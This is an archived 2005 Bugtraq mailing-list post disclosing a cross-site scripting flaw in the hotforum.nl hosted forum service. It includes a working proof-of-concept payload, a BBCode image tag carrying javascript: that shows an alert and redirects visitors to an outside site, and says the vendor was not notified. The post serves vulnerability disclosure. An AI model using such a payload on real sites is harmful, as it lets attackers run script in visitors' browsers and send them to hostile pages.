| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 12 Mar 2005 23:59:16 -0000
From: Rebyte Security <rebyte@...la.com>
To: bugtraq@...urityfocus.com
Subject: ...::: hotforum.nl XSS exploit :::...
hotforum.nl XSS exploit
---------------------------
* 13 march 2005
* Discovered by Qon^Rebyte
..:: STATUS ::..
______________________________________________________________________
hotforum.nl has not yet been notified about this exploit
..:: VULNERABLE ::..
______________________________________________________________________
All hotforums, because it's an on line service.
Once the service is patched all hotforums will be immune.
..:: EXPLOIT ::..
______________________________________________________________________
Risk: Low/Medium
Type: Input Validation Error
What: Input JS code
Proof of Concept
----------------
Post this:
**********************************************************************
[img]javascript:alert('hotforum.nl xss exploit - by Qon^Rebyte');
location.replace('http://dhost.info/recall/rebyte/');[/img]
**********************************************************************
This will alert following message:
"hotforum.nl xss exploit - by Qon^Rebyte"
and redirect to another site:
"http://dhost.info/recall/rebyte/"
..:: CREDITS ::..
______________________________________________________________________
This bug was discovered in approx. 3 minutes time by Qon^Rebyte.
Because it's just a very plain XSS bug :)
Greetings fly out 2
---------------------
* Rebyte Security : because it rox :)
* Mr.Manson : Rebyte co-admin
* Bugtraq : for doing a great job
*** Qon ^ Rebyte ***
-- http://dhost.info/recall/rebyte/ --
---------- rebyte@...la.com ----------
Powered by blists - more mailing lists